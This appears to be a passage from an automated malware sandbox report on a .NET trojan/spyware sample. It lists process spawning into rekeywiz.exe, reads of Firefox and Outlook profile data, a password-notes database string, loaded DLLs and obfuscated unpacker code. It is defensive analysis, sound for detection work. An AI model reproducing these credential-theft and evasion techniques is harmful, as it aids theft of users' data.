                Source: hh01FRs81x.exe, 00000000.00000002.945660626.00000000009FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs hh01FRs81x.exe
                Source: hh01FRs81x.exe, 00000004.00000002.1316126705.000000000175D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs hh01FRs81x.exe
                Source: hh01FRs81x.exe, 00000004.00000002.1315530161.0000000001108000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamerekeywiz.exej% vs hh01FRs81x.exe
                Source: hh01FRs81x.exeBinary or memory string: OriginalFilenameIfzV.exe0 vs hh01FRs81x.exe
                Source: hh01FRs81x.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: hh01FRs81x.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.hh01FRs81x.exe.7c00000.5.raw.unpack, HIvUIGsYtoKEhgiL61.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.hh01FRs81x.exe.7c00000.5.raw.unpack, HIvUIGsYtoKEhgiL61.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.hh01FRs81x.exe.7c00000.5.raw.unpack, sHng7ndrKLAUMwNucF.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.hh01FRs81x.exe.7c00000.5.raw.unpack, sHng7ndrKLAUMwNucF.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.hh01FRs81x.exe.7c00000.5.raw.unpack, sHng7ndrKLAUMwNucF.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/2@15/13
                Source: C:\Users\user\Desktop\hh01FRs81x.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hh01FRs81x.exe.logJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\rekeywiz.exeFile created: C:\Users\user\AppData\Local\Temp\4Fr641e5Jump to behavior
                Source: hh01FRs81x.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: hh01FRs81x.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: rekeywiz.exe, 00000007.00000003.1504118666.000000000085F000.00000004.00000020.00020000.00000000.sdmp, rekeywiz.exe, 00000007.00000003.1504118666.000000000083E000.00000004.00000020.00020000.00000000.sdmp, rekeywiz.exe, 00000007.00000002.3334449717.0000000000869000.00000004.00000020.00020000.00000000.sdmp, rekeywiz.exe, 00000007.00000002.3334449717.000000000085F000.00000004.00000020.00020000.00000000.sdmp, rekeywiz.exe, 00000007.00000002.3334449717.000000000088D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: hh01FRs81x.exeReversingLabs: Detection: 71%
                Source: hh01FRs81x.exeVirustotal: Detection: 70%
                Source: unknownProcess created: C:\Users\user\Desktop\hh01FRs81x.exe "C:\Users\user\Desktop\hh01FRs81x.exe"
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess created: C:\Users\user\Desktop\hh01FRs81x.exe "C:\Users\user\Desktop\hh01FRs81x.exe"
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess created: C:\Users\user\Desktop\hh01FRs81x.exe "C:\Users\user\Desktop\hh01FRs81x.exe"
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exeProcess created: C:\Windows\SysWOW64\rekeywiz.exe "C:\Windows\SysWOW64\rekeywiz.exe"
                Source: C:\Windows\SysWOW64\rekeywiz.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess created: C:\Users\user\Desktop\hh01FRs81x.exe "C:\Users\user\Desktop\hh01FRs81x.exe"Jump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeProcess created: C:\Users\user\Desktop\hh01FRs81x.exe "C:\Users\user\Desktop\hh01FRs81x.exe"Jump to behavior
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exeProcess created: C:\Windows\SysWOW64\rekeywiz.exe "C:\Windows\SysWOW64\rekeywiz.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: netfxperf.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: pdh.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: bitsperf.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: bitsproxy.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: esentprf.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: perfts.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: utildll.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: tdh.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: msdtcuiu.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: atl.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: msdtcprx.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: mtxclu.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: clusapi.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: resutils.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: clusapi.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: resutils.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: msdtcprx.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: ktmw32.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: cscapi.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: msscntrs.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: perfdisk.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: wmiclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: perfnet.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: browcli.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: perfos.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: perfproc.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: sysmain.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: rasctrs.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: tapiperf.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: tapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: perfctrs.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: usbperf.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: tquery.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: cryptdll.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\hh01FRs81x.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeSection loaded: efsadu.dllJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeSection loaded: dsrole.dllJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeSection loaded: efsutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeSection loaded: cryptui.dllJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeSection loaded: mfc42u.dllJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeSection loaded: logoncli.dllJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeSection loaded: credui.dllJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeSection loaded: feclient.dllJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Gm9uUaV91ycxNY3GPL6q.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\hh01FRs81x.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\rekeywiz.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: hh01FRs81x.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: hh01FRs81x.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: hh01FRs81x.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: IfzV.pdb source: hh01FRs81x.exe
                Source: Binary string: rekeywiz.pdb source: hh01FRs81x.exe, 00000004.00000002.1315530161.0000000001108000.00000004.00000020.00020000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 00000006.00000002.3335277197.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: hh01FRs81x.exe, 00000004.00000002.1316126705.0000000001630000.00000040.00001000.00020000.00000000.sdmp, rekeywiz.exe, 00000007.00000003.1315573923.0000000004330000.00000004.00000020.00020000.00000000.sdmp, rekeywiz.exe, 00000007.00000002.3336342602.0000000004690000.00000040.00001000.00020000.00000000.sdmp, rekeywiz.exe, 00000007.00000003.1317649566.00000000044E9000.00000004.00000020.00020000.00000000.sdmp, rekeywiz.exe, 00000007.00000002.3336342602.000000000482E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: IfzV.pdbSHA256u source: hh01FRs81x.exe
                Source: Binary string: wntdll.pdb source: hh01FRs81x.exe, hh01FRs81x.exe, 00000004.00000002.1316126705.0000000001630000.00000040.00001000.00020000.00000000.sdmp, rekeywiz.exe, rekeywiz.exe, 00000007.00000003.1315573923.0000000004330000.00000004.00000020.00020000.00000000.sdmp, rekeywiz.exe, 00000007.00000002.3336342602.0000000004690000.00000040.00001000.00020000.00000000.sdmp, rekeywiz.exe, 00000007.00000003.1317649566.00000000044E9000.00000004.00000020.00020000.00000000.sdmp, rekeywiz.exe, 00000007.00000002.3336342602.000000000482E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: rekeywiz.pdbGCTL source: hh01FRs81x.exe, 00000004.00000002.1315530161.0000000001108000.00000004.00000020.00020000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 00000006.00000002.3335277197.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: Gm9uUaV91ycxNY3GPL6q.exe, 00000006.00000002.3335000308.0000000000ABF000.00000002.00000001.01000000.00000012.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000000.1388624371.0000000000ABF000.00000002.00000001.01000000.00000012.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.hh01FRs81x.exe.3766d20.2.raw.unpack, MainForm.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.hh01FRs81x.exe.5e00000.4.raw.unpack, MainForm.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.hh01FRs81x.exe.7c00000.5.raw.unpack, sHng7ndrKLAUMwNucF.cs.Net Code: AKgumPX4JkoEtf9LENJ System.Reflection.Assembly.Load(byte[])
                Source: 0.2.hh01FRs81x.exe.284f804.0.raw.unpack, MainForm.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 0_2_05CBC258 push eax; mov dword ptr [esp], edx0_2_05CBE4C9
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 0_2_05DF5ABC push esp; retf 0_2_05DF5ABD
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_00401270 push ebp; iretd 4_2_00401372
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0040DB31 push eax; ret 4_2_0040DB32
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0041ABF3 push edi; retf 4_2_0041ABFC
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_00414BF3 push ecx; iretd 4_2_00414C4B
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_004014CD push ebp; iretd 4_2_004014D0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_004034D0 push eax; ret 4_2_004034D2
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_004074FB push ecx; iretd 4_2_004074FE
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_00414D4F push ebx; iretd 4_2_00414E35
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_00414DDB push ebx; iretd 4_2_00414E35
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_00414E3E push ebx; retf 4_2_00414E47
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_004086CC push es; iretd 4_2_004086CF
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_004016AE push ebp; iretd 4_2_004016B1
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0041772D push esi; iretd 4_2_00417730
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0163225F pushad ; ret 4_2_016327F9
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016327FA pushad ; ret 4_2_016327F9
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016609AD push ecx; mov dword ptr [esp], ecx4_2_016609B6
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0163283D push eax; iretd 4_2_01632858
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046927FA pushad ; ret 7_2_046927F9
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0469225F pushad ; ret 7_2_046927F9
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_0469283D push eax; iretd 7_2_04692858
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_046C09AD push ecx; mov dword ptr [esp], ecx7_2_046C09B6
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_006D4028 push ecx; iretd 7_2_006D402B
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_006D51F9 push es; iretd 7_2_006D51FC
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_006E425A push esi; iretd 7_2_006E425D
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_006DE388 push ebx; retf 7_2_006DE394
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_006E0690 push es; ret 7_2_006E06C1
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_006E1720 push ecx; iretd 7_2_006E1778
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_006E7720 push edi; retf 7_2_006E7729
                Source: C:\Windows\SysWOW64\rekeywiz.exeCode function: 7_2_006E187C push ebx; iretd 7_2_006E1962
                Source: hh01FRs81x.exeStatic PE information: section name: .text entropy: 7.729265166902141
                Source: 0.2.hh01FRs81x.exe.7c00000.5.raw.unpack, BwGkJQ0hlNtoB1nnFM.csHigh entropy of concatenated method names: 'Ew4Nlwb1wG', 'jLvNPxlpc4', 'ToString', 'n9YNI7YM4B', 'EkQNGjmouy', 'JX8NYAvP7n', 'Qs5Nvdn7rb', 'jByNDOSLpK', 'uUnNtZM117', 'rkfNdtEOeg'
                Source: 0.2.hh01FRs81x.exe.7c00000.5.raw.unpack, vWVbwEWoN3FpC9kTCY.csHigh entropy of concatenated method names: 'wxjtMdybun', 'fX0tmBulKS', 'L35t8kFYe1', 'r5NtBpIGEU', 'VWYtgmjcai', 'rbGtqjlFRN', 'HWCtQhCc7k', 'Y5rts8rUoa', 'cbUt4wUswa', 'Sl7taebHg5'
                Source: 0.2.hh01FRs81x.exe.7c00000.5.raw.unpack, PmIcmBzgk5InQEr1l8.csHigh entropy of concatenated method names: 'raKZq0HajC', 'Q5wZsxiiPy', 'KyRZ4ULjZm', 'Ej0ZOfBc6A', 'DUkZxduE3S', 'YhtZrS62GE', 'doWZkU7ifa', 'MboZya9eHH', 'NJyZMSbOjf', 'WJCZmfI9TY'
                Source: 0.2.hh01FRs81x.exe.7c00000.5.raw.unpack, XPuAUb4cfsTi2HtCT0.csHigh entropy of concatenated method names: 'W2EYBKmRgU', 'UoQYqNsQ9O', 'kMSYsIvL02', 'xA9Y4W7Jyx', 'V8sYcbIWZA', 't6HYSWoPnK', 'didYNglPPI', 'hmsYoyQFM5', 'Ls1YuipmqZ', 'wPvYZtT4bb'
                Source: 0.2.hh01FRs81x.exe.7c00000.5.raw.unpack, dwEy0L6AyjiMoQmIuL.csHigh entropy of concatenated method names: 'EO1tIRMEwe', 'xKXtYjw5Vl', 'MaYtDcmA7i', 'aO4DnN5LF7', 'ambDz8FEDC', 'flstE8ugBy', 'KKxtC62qhS', 'ys7tXsyUHT', 'k4gtpEc1Q5', 'dHct96K3F8'
                Source: 0.2.hh01FRs81x.exe.7c00000.5.raw.unpack, VVwBU9OTwtG7t86teG.csHigh entropy of concatenated method names: 'DuEDihEV4q', 'GKZDGj5tH3', 'IDhDvZoGGh', 'F5dDtgIVwI', 'HbCDdSCap9', 'o7av5HCiMZ', 'tbXvhrPeKR', 'FWXvVU3cQc', 'wYqvKRUrv4', 'PtWv7Gh0Y6'
                Source: 0.2.hh01FRs81x.exe.7c00000.5.raw.unpack, Gs2hZvha6yYyt34Itu.csHigh entropy of concatenated method names: 'RJ2NKVFLyU', 'KcrNnsy92W', 'TcSoEl8h8b', 'Vf2oCQ6EuC', 'UpGNFq828g', 'D5lNjFrar5', 'WZDNHCCeyT', 'sUlN1C1E1N', 'kMxNfLCUvZ', 'oAJN37iFoj'
                Source: 0.2.hh01FRs81x.exe.7c00000.5.raw.unpack, NVHWZLCXdKZ7Y3MgcF0.csHigh entropy of concatenated method names: 'ToString', 'OhyUsdwGIt', 'PJgU4H6hft', 'S0yUaFYuJp', 'aQqUOcMH9X', 'llIUxbfxLU', 'W5iU2sf7Ud', 'BsHUrQ46bE', 'CJVaUYLQhWvm8ogypvg', 'mxNGesLMQ1dYDrQj8oB'
                Source: 0.2.hh01FRs81x.exe.7c00000.5.raw.unpack, w8vqTrarurLRg8K3C6.csHigh entropy of concatenated method names: 'mlmvg037ak', 'YM6vQvr4DH', 'xFpY246Ma0', 'E2HYr4D6Wq', 'k2sYkK4bUh', 'Q9cYJ4KLNm', 'eNHY6w6Gfe', 'zgmYT2q84s', 'fkbYW93rMQ', 'tJ8Ye2w3RX'
                Source: 0.2.hh01FRs81x.exe.7c00000.5.raw.unpack, V3ToYbnv6udsOIKp6T.csHigh entropy of concatenated method names: 'FTTZYD0O1K', 'SMhZvCOVlj', 'rUDZDWUwgs', 'z86ZtJVI2v', 'hNCZu0KeuI', 'r8DZdUMiFA', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.hh01FRs81x.exe.7c00000.5.raw.unpack, sHng7ndrKLAUMwNucF.csHigh entropy of concatenated method names: 'DcDpifVZRH', 'UjQpIcfl9K', 'cRUpG46Bbl', 'WNgpYUrBCP', 'bd1pvUeM2V', 'bbkpDZCpkL', 'T92ptAnDSD', 'bqapdMn15F', 'oYIpb8eMxf', 'PTGplV4x2v'
                Source: 0.2.hh01FRs81x.exe.7c00000.5.raw.unpack, evkMPJHPR6B6KVeJ8W.csHigh entropy of concatenated method names: 'LOrwsYjMtI', 'zlaw4JNUqK', 'cDHwOAm3t8', 'KPwwxM7b2w', 'I9Iwr3TMq9', 'h2swkPQoZT', 'EUqw6CsYj4', 'NhlwTViNKH', 'v52weyKsDb', 'yfowFxh2Xv'
